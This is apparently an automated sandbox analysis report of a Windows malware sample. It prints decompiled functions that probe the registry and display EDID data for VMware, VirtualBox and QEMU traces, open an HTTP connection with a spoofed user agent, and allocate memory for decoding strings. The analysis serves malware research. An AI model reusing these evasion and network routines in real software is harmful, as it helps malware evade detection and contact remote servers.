__FF_MSGBANNER 24 API calls 8177->8179 8180 406ce5 __amsg_exit 24 API calls 8178->8180 8179->8178 8181 403972 8180->8181 8182 406a13 _malloc 3 API calls 8181->8182 8183 40397c 8182->8183 8318 4071dc 8319 407214 8318->8319 8320 4071ea 8318->8320 8320->8319 8322 40acb8 8320->8322 8323 40acc4 __freefls@4 8322->8323 8324 40665f _LocaleUpdate::_LocaleUpdate 46 API calls 8323->8324 8325 40acc9 8324->8325 8326 40c52a _abort 51 API calls 8325->8326 8327 40aceb __freefls@4 8326->8327 8327->8319 7430 407c1f 7431 407c2b SetLastError 7430->7431 7432 407c33 __freefls@4 7430->7432 7431->7432

                                              Executed Functions

                                              Control-flow Graph

                                              C-Code - Quality: 88%
                                              			E02B5372C(void* __edi, void* __esi, void* __eflags, short _a4) {
                                              				WCHAR* _v0;
                                              				signed int _v8;
                                              				void _v12;
                                              				long _v16;
                                              				long _v20;
                                              				void _v24;
                                              				intOrPtr _v28;
                                              				long _v32;
                                              				void* _v36;
                                              				void* _v40;
                                              				WCHAR* _v48;
                                              				char _v704;
                                              				char _v708;
                                              				short _v2108;
                                              				WCHAR* _v2120;
                                              				WCHAR* _v2124;
                                              				WCHAR* _v2128;
                                              				WCHAR* _v2132;
                                              				intOrPtr _v2136;
                                              				WCHAR* _v2140;
                                              				void* _v2148;
                                              				WCHAR* _v2152;
                                              				char* _v2156;
                                              				void* __ebx;
                                              				signed int _t55;
                                              				intOrPtr _t61;
                                              				intOrPtr _t65;
                                              				void* _t67;
                                              				WCHAR* _t120;
                                              				intOrPtr* _t124;
                                              				intOrPtr* _t126;
                                              				intOrPtr _t128;
                                              				void* _t130;
                                              				void* _t134;
                                              				WCHAR* _t135;
                                              				void* _t140;
                                              				WCHAR* _t142;
                                              				signed int _t147;
                                              
                                              				_t55 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t55 ^ _t147;
                                              				 *0x2b593a8 = 0; // executed
                                              				E02B533DB(0, __edi, __esi); // executed
                                              				if( *0x2b59474 != 0) {
                                              					lstrcpyA( &_v708, "(1):");
                                              					E02B5355B(0,  &_v704, __edi, __esi);
                                              					_t124 =  &_v708;
                                              					_t134 = _t124 + 1;
                                              					do {
                                              						_t61 =  *_t124;
                                              						_t124 = _t124 + 1;
                                              					} while (_t61 != 0);
                                              					MultiByteToWideChar(0, 0,  &_v708, _t124 - _t134,  &_v2108, 0x104);
                                              					_t126 =  &_v708;
                                              					_t135 = _t126 + 1;
                                              					do {
                                              						_t65 =  *_t126;
                                              						_t126 = _t126 + 1;
                                              					} while (_t65 != 0);
                                              					_t128 = _t126 - _t135 + _t126 - _t135;
                                              					if(_t128 >= 0x578) {
                                              						E02B53D67();
                                              						asm("int3");
                                              						_push(_t147);
                                              						_push(0);
                                              						_push(__esi);
                                              						_t142 = 0;
                                              						_v2156 = L"text/*";
                                              						_push(__edi);
                                              						_v2124 = 0;
                                              						_t120 = _t135;
                                              						_v2136 = _t128;
                                              						_v2140 = 0;
                                              						_v2120 = 0;
                                              						_v2132 = 0;
                                              						_v2128 = 0;
                                              						_v2152 = 0;
                                              						_t67 = InternetOpenW(L"Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413", 0, 0, 0, 0);
                                              						_v2148 = _t67;
                                              						if(_t67 != 0) {
                                              							_t130 = InternetConnectW(_t67, _t120, _a4, 0x2b542bc, 0x2b542bc, 3, 0, 0);
                                              							_v36 = _t130;
                                              							if(_t130 != 0) {
                                              								_t72 =  !=  ? 0x84803000 : 0x84003000;
                                              								_v12 =  !=  ? 0x84803000 : 0x84003000;
                                              								_t140 = HttpOpenRequestW(_t130, L"GET", _v0, L"HTTP/1.1", 0,  &_v48, 0x84003000, 0);
                                              								if(_t140 != 0) {
                                              									if(_v28 != 0) {
                                              										_v16 = 4;
                                              										InternetQueryOptionW(_t140, 0x1f,  &_v12,  &_v16);
                                              										_v12 = _v12 | 0x00000080;
                                              										InternetSetOptionW(_t140, 0x1f,  &_v12, 4);
                                              									}
                                              									_t142 = HttpSendRequestW(_t140, _t142, _t142, _t142, _t142);
                                              									if(_t142 != 0) {
                                              										_v20 = 4;
                                              										_t142 = HttpQueryInfoW(_t140, 0x20000013,  &_v24,  &_v20,  &_v32);
                                              										if(_t142 != 0) {
                                              											_t142 =  !=  ? 0 : _t142;
                                              										}
                                              									} else {
                                              										GetLastError();
                                              									}
                                              									InternetCloseHandle(_t140);
                                              								}
                                              								InternetCloseHandle(_v36);
                                              							}
                                              							InternetCloseHandle(_v40);
                                              						}
                                              						return _t142;
                                              					} else {
                                              						_push(__esi);
                                              						 *((short*)(_t147 + _t128 - 0x838)) = 0;
                                              						if(StrStrIW( &_v2108, L"VMware") == 0 && StrStrIW( &_v2108, L"VirtualBox") == 0 && StrStrIW( &_v2108, L"VBox") == 0 && StrStrIW( &_v2108, L"QEMU") == 0 && StrStrIW( &_v2108, L"Western Disk") == 0 && StrStrIW( &_v2108, L" HARDDISK") == 0) {
                                              							lstrcpyA( &_v708, "(2):");
                                              							E02B52E5C(0,  &_v704, __edi, StrStrIW);
                                              							if(StrStrIA( &_v708, "VMware") != 0 || StrStrIA( &_v708, "VirtualBox") != 0 || StrStrIA( &_v708, "VBox") != 0 || StrStrIA( &_v708, "QEMU") != 0 || StrStrIA( &_v708, "Display Adapter") != 0 && StrStrIA( &_v708, "Non-PnP") != 0) {
                                              								goto L19;
                                              							}
                                              						}
                                              						goto L21;
                                              					}
                                              				} else {
                                              					L21:
                                              					return E02B53C33(_v8 ^ _t147);
                                              				}
                                              			}









































                                              0x02b53735
                                              0x02b5373c
                                              0x02b53742
                                              0x02b53748
                                              0x02b53753
                                              0x02b53767
                                              0x02b53773
                                              0x02b53778
                                              0x02b5377e
                                              0x02b53781
                                              0x02b53781
                                              0x02b53783
                                              0x02b53784
                                              0x02b537a0
                                              0x02b537a6
                                              0x02b537ac
                                              0x02b537af
                                              0x02b537af
                                              0x02b537b1
                                              0x02b537b2
                                              0x02b537b8
                                              0x02b537c0
                                              0x02b538ff
                                              0x02b53904
                                              0x02b53905
                                              0x02b5390b
                                              0x02b5390c
                                              0x02b5390d
                                              0x02b5390f
                                              0x02b53916
                                              0x02b5391d
                                              0x02b53925
                                              0x02b53927
                                              0x02b5392a
                                              0x02b5392d
                                              0x02b53930
                                              0x02b53933
                                              0x02b53936
                                              0x02b53939
                                              0x02b5393f
                                              0x02b53944
                                              0x02b53966
                                              0x02b53968
                                              0x02b5396d
                                              0x02b53980
                                              0x02b53984
                                              0x02b539a0
                                              0x02b539a4
                                              0x02b539ad
                                              0x02b539b2
                                              0x02b539c1
                                              0x02b539c7
                                              0x02b539d7
                                              0x02b539d7
                                              0x02b539e8
                                              0x02b539ec
                                              0x02b539f9
                                              0x02b53a15
                                              0x02b53a19
                                              0x02b53a24
                                              0x02b53a24
                                              0x02b539ee
                                              0x02b539ee
                                              0x02b539ee
                                              0x02b53a28
                                              0x02b53a28
                                              0x02b53a2d
                                              0x02b53a2d
                                              0x02b53a32
                                              0x02b53a32
                                              0x02b53a3c
                                              0x02b537c6
                                              0x02b537c6
                                              0x02b537cf
                                              0x02b537e7
                                              0x02b53867
                                              0x02b53873
                                              0x02b5388e
                                              0x00000000
                                              0x00000000
                                              0x02b5388e
                                              0x00000000
                                              0x02b538ed
                                              0x02b53755
                                              0x02b538ee
                                              0x02b538fe
                                              0x02b538fe

                                              APIs
                                                • Part of subcall function 02B533DB: RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\ControlSet001\Enum\DISPLAY,00000000,00000009,?), ref: 02B53405
                                                • Part of subcall function 02B533DB: RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B53442
                                                • Part of subcall function 02B533DB: RegCloseKey.ADVAPI32(?), ref: 02B53546
                                              • lstrcpyA.KERNEL32(?,(1):), ref: 02B53767
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 02B537A0
                                              • StrStrIW.SHLWAPI(?,VMware), ref: 02B537E3
                                              • StrStrIW.SHLWAPI(?,VirtualBox), ref: 02B537F9
                                              • StrStrIW.SHLWAPI(?,VBox), ref: 02B5380F
                                              • StrStrIW.SHLWAPI(?,QEMU), ref: 02B53825
                                              • StrStrIW.SHLWAPI(?,Western Disk), ref: 02B5383B
                                              • StrStrIW.SHLWAPI(?, HARDDISK), ref: 02B53851
                                              • lstrcpyA.KERNEL32(?,(2):), ref: 02B53867
                                              • StrStrIA.SHLWAPI(?,VMware), ref: 02B5388A
                                              • StrStrIA.SHLWAPI(?,VirtualBox), ref: 02B5389C
                                              • StrStrIA.SHLWAPI(?,VBox), ref: 02B538AE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: lstrcpy$ByteCharCloseInfoMultiOpenQueryWide
                                              • String ID: HARDDISK$(1):$(2):$Display Adapter$Non-PnP$QEMU$QEMU$VBox$VBox$VMware$VMware$VirtualBox$VirtualBox$Western Disk
                                              • API String ID: 1860444428-2002398593
                                              • Opcode ID: c56404748d35d231faca52375ce520f55a45932a12c8f683e8483b51a7c86c6b
                                              • Instruction ID: 7f9a5c09d5d497de349f2ca76c884c7a9fa4cd0a04b8062efd1815e68d050abe
                                              • Opcode Fuzzy Hash: c56404748d35d231faca52375ce520f55a45932a12c8f683e8483b51a7c86c6b
                                              • Instruction Fuzzy Hash: F4414F70D41339DAEF14EAA0DC94FAD77FCAF04A84F0444E5AD06DB100EB79A6859FA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 90%
                                              			E02B5308A(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				char _v208;
                                              				char _v408;
                                              				char _v1295;
                                              				void* _v1300;
                                              				char _v1313;
                                              				void* _v1318;
                                              				char _v1331;
                                              				void* _v1336;
                                              				char _v1349;
                                              				void* _v1354;
                                              				intOrPtr _v1404;
                                              				char _v1408;
                                              				short _v1920;
                                              				char _v2120;
                                              				short _v2632;
                                              				void* _v2636;
                                              				int _v2640;
                                              				void* _v2644;
                                              				int* _v2648;
                                              				int _v2652;
                                              				int _v2656;
                                              				short* _v2660;
                                              				int _v2664;
                                              				int _v2668;
                                              				int _v2672;
                                              				int _v2676;
                                              				signed int _t70;
                                              				long _t73;
                                              				int _t82;
                                              				long _t94;
                                              				long _t99;
                                              				long _t110;
                                              				char _t120;
                                              				CHAR* _t123;
                                              				long _t127;
                                              				intOrPtr _t129;
                                              				void* _t135;
                                              				CHAR* _t149;
                                              				char _t154;
                                              				void* _t156;
                                              				void* _t159;
                                              				signed int _t161;
                                              
                                              				_t70 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t70 ^ _t161;
                                              				_v2640 = 0x3e8;
                                              				_v2660 = __ecx;
                                              				_v2648 = 0;
                                              				_t73 = RegOpenKeyExW(0x80000002, __ecx, 0, 9,  &_v2644); // executed
                                              				if(_t73 != 0 || RegQueryInfoKeyW(_v2644, 0, 0, 0,  &_v2656,  &_v2676, 0,  &_v2672,  &_v2668,  &_v2664, 0, 0) != 0) {
                                              					L23:
                                              					return E02B53C33(_v8 ^ _t161);
                                              				} else {
                                              					_t82 = _v2656 - 1;
                                              					_push(__edi);
                                              					_t156 = RegCloseKey;
                                              					_v2652 = _t82;
                                              					if(_t82 < 0) {
                                              						L22:
                                              						RegCloseKey(_v2644); // executed
                                              						goto L23;
                                              					}
                                              					_t135 = lstrcatA;
                                              					_push(__esi);
                                              					_t159 = lstrcpyA;
                                              					do {
                                              						_v2632 = 0;
                                              						RegEnumKeyW(_v2644, _t82,  &_v2632, 0x100); // executed
                                              						_v1920 = 0;
                                              						E02B52C9C( &_v1920, _v2660);
                                              						StrCatW( &_v1920, "\\");
                                              						StrCatW( &_v1920,  &_v2632);
                                              						_t94 = RegOpenKeyExW(0x80000002,  &_v1920, 0, 9,  &_v2636); // executed
                                              						if(_t94 == 0) {
                                              							_v2640 = 0x3e8;
                                              							_v1408 = 0;
                                              							_t127 = RegQueryValueExA(_v2636, "Driver", 0, 0,  &_v1408,  &_v2640); // executed
                                              							if(_t127 == 0) {
                                              								RegCloseKey(_v2636); // executed
                                              								_t129 = E02B52FD4(_t135,  &_v1408, _t156, _t159); // executed
                                              								_v2648 = _t129;
                                              								lstrcpyA( &_v2120,  &_v1408);
                                              							}
                                              						}
                                              						StrCatW( &_v1920, L"\\Device Parameters");
                                              						_t99 = RegOpenKeyExW(0x80000002,  &_v1920, 0, 9,  &_v2636); // executed
                                              						if(_t99 == 0) {
                                              							_v2640 = 0x3e8;
                                              							_v1408 = 0;
                                              							_t110 = RegQueryValueExW(_v2636, L"EDID", 0, 0,  &_v1408,  &_v2640); // executed
                                              							if(_t110 != 0 || _v1408 != 0xffffff00 || _v1404 != 0xffffff) {
                                              								lstrcpyA( &_v208, "No EDID!");
                                              								goto L20;
                                              							} else {
                                              								 *0x2b59474 =  *0x2b59474 + 1;
                                              								RegCloseKey(_v2636);
                                              								_t154 = 0;
                                              								_t115 =  !=  ? _t154 :  &_v1349;
                                              								_t147 =  !=  ?  !=  ? _t154 :  &_v1349 :  &_v1331;
                                              								_t117 =  !=  ?  !=  ?  !=  ? _t154 :  &_v1349 :  &_v1331 :  &_v1313;
                                              								_t149 =  !=  ?  !=  ?  !=  ?  !=  ? _t154 :  &_v1349 :  &_v1331 :  &_v1313 :  &_v1295;
                                              								if(_t149 == 0) {
                                              									lstrcpyA( &_v208, "BAD EDID!");
                                              									 *0x2b59474 =  *0x2b59474 + 1;
                                              									goto L20;
                                              								}
                                              								_t120 = _t154;
                                              								if( *_t149 == 0xa) {
                                              									L14:
                                              									 *((char*)(_t120 + _t149)) = _t154;
                                              									lstrcpyA( &_v208, _t149);
                                              									_t123 =  &_v208;
                                              									if(_v2648 == 0) {
                                              										_push("(NotActive)");
                                              									} else {
                                              										_push("(IsActive)");
                                              									}
                                              									lstrcatA(_t123, ??);
                                              									goto L20;
                                              								} else {
                                              									goto L13;
                                              								}
                                              								do {
                                              									L13:
                                              									_t120 = _t120 + 1;
                                              								} while ( *((char*)(_t120 + _t149)) != 0xa);
                                              								goto L14;
                                              							}
                                              						}
                                              						L20:
                                              						_v408 = 0;
                                              						lstrcatA( &_v408, "--Nm:");
                                              						lstrcatA( &_v408,  &_v208);
                                              						E02B52D16(0x2b593a8,  &_v408, 0xc8);
                                              						_t82 = _v2652 - 1;
                                              						_v2652 = _t82;
                                              					} while (_t82 >= 0);
                                              					goto L22;
                                              				}
                                              			}














































                                              0x02b53093
                                              0x02b5309a
                                              0x02b530a0
                                              0x02b530b0
                                              0x02b530c2
                                              0x02b530c8
                                              0x02b530d0
                                              0x02b533cc
                                              0x02b533da
                                              0x02b53113
                                              0x02b53119
                                              0x02b5311c
                                              0x02b5311d
                                              0x02b53123
                                              0x02b53129
                                              0x02b533c3
                                              0x02b533c9
                                              0x00000000
                                              0x02b533cb
                                              0x02b5312f
                                              0x02b53135
                                              0x02b53136
                                              0x02b5313c
                                              0x02b53143
                                              0x02b53158
                                              0x02b5316c
                                              0x02b53173
                                              0x02b53184
                                              0x02b53198
                                              0x02b531b5
                                              0x02b531bd
                                              0x02b531c5
                                              0x02b531e6
                                              0x02b531ec
                                              0x02b531f4
                                              0x02b531fc
                                              0x02b53204
                                              0x02b53209
                                              0x02b5321d
                                              0x02b5321d
                                              0x02b531f4
                                              0x02b5322b
                                              0x02b53248
                                              0x02b53250
                                              0x02b5325c
                                              0x02b5327d
                                              0x02b53283
                                              0x02b5328b
                                              0x02b5336f
                                              0x00000000
                                              0x02b532b1
                                              0x02b532b7
                                              0x02b532bd
                                              0x02b532d1
                                              0x02b532d2
                                              0x02b532e5
                                              0x02b532f8
                                              0x02b5330b
                                              0x02b53310
                                              0x02b53359
                                              0x02b5335b
                                              0x00000000
                                              0x02b5335b
                                              0x02b53315
                                              0x02b53317
                                              0x02b53320
                                              0x02b53320
                                              0x02b5332b
                                              0x02b53334
                                              0x02b5333a
                                              0x02b53343
                                              0x02b5333c
                                              0x02b5333c
                                              0x02b5333c
                                              0x02b53349
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02b53319
                                              0x02b53319
                                              0x02b53319
                                              0x02b5331a
                                              0x00000000
                                              0x02b53319
                                              0x02b5328b
                                              0x02b53371
                                              0x02b53373
                                              0x02b53385
                                              0x02b53395
                                              0x02b533a7
                                              0x02b533b2
                                              0x02b533b6
                                              0x02b533b6
                                              0x00000000
                                              0x02b533c2

                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?,00000000), ref: 02B530C8
                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B53105
                                              • RegEnumKeyW.ADVAPI32(?,?,?,00000100), ref: 02B53158
                                              • StrCatW.SHLWAPI(?,02B54480), ref: 02B53184
                                              • StrCatW.SHLWAPI(?,?), ref: 02B53198
                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?), ref: 02B531B5
                                              • RegQueryValueExA.KERNELBASE(?,Driver,00000000,00000000,?,000003E8), ref: 02B531EC
                                              • RegCloseKey.KERNELBASE(?), ref: 02B531FC
                                                • Part of subcall function 02B52FD4: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 02B5306A
                                              • lstrcpyA.KERNEL32(?,?), ref: 02B5321D
                                              • StrCatW.SHLWAPI(?,\Device Parameters), ref: 02B5322B
                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?), ref: 02B53248
                                              • RegQueryValueExW.KERNELBASE(?,EDID,00000000,00000000,?,000003E8), ref: 02B53283
                                              • RegCloseKey.ADVAPI32(?), ref: 02B532BD
                                              • lstrcpyA.KERNEL32(?,?), ref: 02B5332B
                                              • lstrcatA.KERNEL32(?,(NotActive)), ref: 02B53349
                                              • lstrcpyA.KERNEL32(?,BAD EDID!), ref: 02B53359
                                              • lstrcpyA.KERNEL32(?,No EDID!), ref: 02B5336F
                                              • lstrcatA.KERNEL32(?,--Nm:), ref: 02B53385
                                              • lstrcatA.KERNEL32(?,?), ref: 02B53395
                                              • RegCloseKey.KERNELBASE(?), ref: 02B533C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: lstrcpy$CloseOpenQuerylstrcat$EnumValue$DevicesDisplayInfo
                                              • String ID: (IsActive)$(NotActive)$--Nm:$BAD EDID!$Driver$EDID$No EDID!$\Device Parameters
                                              • API String ID: 3539320493-878170080
                                              • Opcode ID: 54d96ae3322c40133f133b92702a75b0fea06e66485431993fe1d9d7087c6a63
                                              • Instruction ID: 12465a584bf6c84ce719640fefe936f839dada52fd8ff82a576c8c8f6967ef53
                                              • Opcode Fuzzy Hash: 54d96ae3322c40133f133b92702a75b0fea06e66485431993fe1d9d7087c6a63
                                              • Instruction Fuzzy Hash: 62915C71E44328AFEB21CB60DC44FEAB7BCEF49241F0445DAA90EA6150EB749E848F11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 65 1380000-1380129 66 138012d-1380131 65->66 67 1380150 66->67 68 1380133-138014e 66->68 69 1380157-138015b 67->69 68->66 70 138017a 69->70 71 138015d-1380178 69->71 72 1380181-1380185 70->72 71->69 73 13801a4 72->73 74 1380187-13801a2 72->74 75 13801ab-13801af 73->75 74->72 76 13801ce-1380220 call 1380a20 call 1380420 * 3 VirtualAlloc 75->76 77 13801b1-13801cc 75->77 86 1380227-138022d 76->86 77->75 87 138024a 86->87 88 138022f-1380248 86->88 89 1380251-1380257 87->89 88->86 90 1380278 89->90 91 1380259-1380276 89->91 92 138027f-1380285 90->92 91->89 93 13802a9-13802b1 call 1380980 92->93 94 1380287-13802a7 92->94 96 13802b6-13802bc 93->96 94->92
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,00008000,00001000,00000040,?,uJQWVBObOOL@#,?,dFWsQL@bGGQFPP#,?,oLBGoJAQBQZb#), ref: 0138021A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: #$#$#$#$#$#$#$#$#$#$#$#$#$#$F$F$G$M$O$O$O$Q$dFWsQL@bGGQFPP#$h$oLBGoJAQBQZb#$uJQWVBObOOL@#
                                              • API String ID: 4275171209-3179062328
                                              • Opcode ID: a667f0704a7d82f616ddd1e21fc4d9f6a3294f9a3529670c392b19acac27728d
                                              • Instruction ID: 8f26b30fb2c0545950e6913ff4e307dd33eafcba25c90c3465dccd7e36d5866d
                                              • Opcode Fuzzy Hash: a667f0704a7d82f616ddd1e21fc4d9f6a3294f9a3529670c392b19acac27728d
                                              • Instruction Fuzzy Hash: 99B1BB70D083CDDAEB05DBE8D4997EEBFB15F16308F180099D6457B282C3BA5548CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 97 403ce9-403da8 99 403db3-403db7 97->99 100 403db9-403dcb 99->100 101 403dcd-403dd4 99->101 100->99 102 403ddf-403de3 101->102 104 403de5-403df7 102->104 105 403df9-403e00 102->105 104->102 107 403e0b-403e0f 105->107 108 403e11-403e23 107->108 109 403e25-403e88 call 4041c9 call 4042e9 * 2 VirtualAlloc 107->109 108->107 118 403e8b-403e94 109->118 119 403eb1-403ec7 118->119 120 403e96-403eaf 118->120 121 403ec9-403ef4 119->121 122 403efc-403f52 119->122 120->118 121->122
                                              C-Code - Quality: 80%
                                              			E00403CE9() {
                                              
                                              				asm("invalid");
                                              				 *0x45C60582 = 0x64;
                                              				 *0x45C60583 = 0x46;
                                              				 *0x45C60584 = 0x57;
                                              				 *0x45C60585 = 0x6e;
                                              				 *0x45C60587 = 0x47;
                                              				 *0x45C60588 = 0x56;
                                              				 *0x45C60589 = 0x4f;
                                              				 *0x45C6058A = 0x46;
                                              				asm("rol byte [esi-0x3a], 0x45");
                                              				 *0x45C6058B = 0x6b;
                                              				 *0x45C6058C = 0x42;
                                              				 *0x45C6058E = 0x4d;
                                              			}



                                              0x00403ce9
                                              0x00403cee
                                              0x00403cf2
                                              0x00403cf6
                                              0x00403cfa
                                              0x00403d02
                                              0x00403d06
                                              0x00403d0a
                                              0x00403d0e
                                              0x00403d10
                                              0x00403d12
                                              0x00403d16
                                              0x00403d1a

                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,dFWnLGVOFkBMGOFb#,?,uJQWVBObOOL@#,00000068), ref: 00403E61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: #$#$#$#$#$#$#$#$#$#$#$#$#$#$F$F$G$M$O$O$O$Q$dFWnLGVOFkBMGOFb#$h$uJQWVBObOOL@#
                                              • API String ID: 4275171209-2024267467
                                              • Opcode ID: 8d5d883060cc9150a05710e582697f4ca895b5f8adf5ff47d59d0031821a50da
                                              • Instruction ID: dcf4675412af51c673b628ccfd695aecf6fe8e9418b7ad345c6cd616ce72be28
                                              • Opcode Fuzzy Hash: 8d5d883060cc9150a05710e582697f4ca895b5f8adf5ff47d59d0031821a50da
                                              • Instruction Fuzzy Hash: 7B91F970D08388CEEB11CBE8D5997DDBFB1AF16308F1401A9D549AF382C3BA5985CB56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 97%
                                              			E02B533DB(void* __ebx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				short _v520;
                                              				short _v1032;
                                              				void* _v1036;
                                              				void* _v1040;
                                              				int _v1044;
                                              				int _v1048;
                                              				int _v1052;
                                              				int _v1056;
                                              				int _v1060;
                                              				int _v1064;
                                              				signed int _t31;
                                              				long _t34;
                                              				long _t55;
                                              				long _t61;
                                              				void* _t64;
                                              				void* _t71;
                                              				int _t74;
                                              				signed int _t75;
                                              
                                              				_t71 = __edi;
                                              				_t64 = __ebx;
                                              				_t31 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t31 ^ _t75;
                                              				_t34 = RegOpenKeyExW(0x80000002, L"SYSTEM\\ControlSet001\\Enum\\DISPLAY", 0, 9,  &_v1036); // executed
                                              				if(_t34 != 0) {
                                              					L10:
                                              					return E02B53C33(_v8 ^ _t75);
                                              				}
                                              				if(RegQueryInfoKeyW(_v1036, 0, 0, 0,  &_v1044,  &_v1060, 0,  &_v1056,  &_v1052,  &_v1048, 0, 0) != 0) {
                                              					L9:
                                              					RegCloseKey(_v1036);
                                              					goto L10;
                                              				} else {
                                              					_t74 = _v1044;
                                              					while(1) {
                                              						_t74 = _t74 - 1;
                                              						if(_t74 < 0) {
                                              							goto L9;
                                              						}
                                              						_v1032 = 0;
                                              						RegEnumKeyW(_v1036, _t74,  &_v1032, 0x100); // executed
                                              						_v520 = 0;
                                              						E02B52C9C( &_v520, L"SYSTEM\\ControlSet001\\Enum\\DISPLAY");
                                              						StrCatW( &_v520, "\\");
                                              						StrCatW( &_v520,  &_v1032);
                                              						_t55 = RegOpenKeyExW(0x80000002,  &_v520, 0, 9,  &_v1040); // executed
                                              						if(_t55 == 0) {
                                              							_t61 = RegQueryInfoKeyW(_v1040, 0, 0, 0,  &_v1064,  &_v1060, 0,  &_v1056,  &_v1052,  &_v1048, 0, 0);
                                              							if(_t61 == 0) {
                                              								if(_v1064 != _t61) {
                                              									E02B5308A(_t64,  &_v520, _t71, _t74); // executed
                                              								}
                                              								RegCloseKey(_v1040);
                                              							}
                                              						}
                                              					}
                                              					goto L9;
                                              				}
                                              			}






















                                              0x02b533db
                                              0x02b533db
                                              0x02b533e4
                                              0x02b533eb
                                              0x02b53405
                                              0x02b5340d
                                              0x02b5354c
                                              0x02b5355a
                                              0x02b5355a
                                              0x02b5344a
                                              0x02b53540
                                              0x02b53546
                                              0x00000000
                                              0x02b53450
                                              0x02b53450
                                              0x02b53537
                                              0x02b53537
                                              0x02b5353a
                                              0x00000000
                                              0x00000000
                                              0x02b53462
                                              0x02b53477
                                              0x02b5348a
                                              0x02b53491
                                              0x02b534a2
                                              0x02b534b6
                                              0x02b534d3
                                              0x02b534db
                                              0x02b5350e
                                              0x02b53516
                                              0x02b5351e
                                              0x02b53526
                                              0x02b53526
                                              0x02b53531
                                              0x02b53531
                                              0x02b53516
                                              0x02b534db
                                              0x00000000
                                              0x02b53537

                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\ControlSet001\Enum\DISPLAY,00000000,00000009,?), ref: 02B53405
                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B53442
                                              • RegEnumKeyW.ADVAPI32(?,?,?,00000100), ref: 02B53477
                                              • StrCatW.SHLWAPI(?,02B54480), ref: 02B534A2
                                              • StrCatW.SHLWAPI(?,?), ref: 02B534B6
                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?), ref: 02B534D3
                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B5350E
                                              • RegCloseKey.ADVAPI32(?), ref: 02B53531
                                              • RegCloseKey.ADVAPI32(?), ref: 02B53546
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: CloseInfoOpenQuery$Enum
                                              • String ID: SYSTEM\ControlSet001\Enum\DISPLAY
                                              • API String ID: 938792220-4245451955
                                              • Opcode ID: ada36984a414456eb4f95f64f14468dfa1f342e4c40e7b411c3d41fd9bd7b0b8
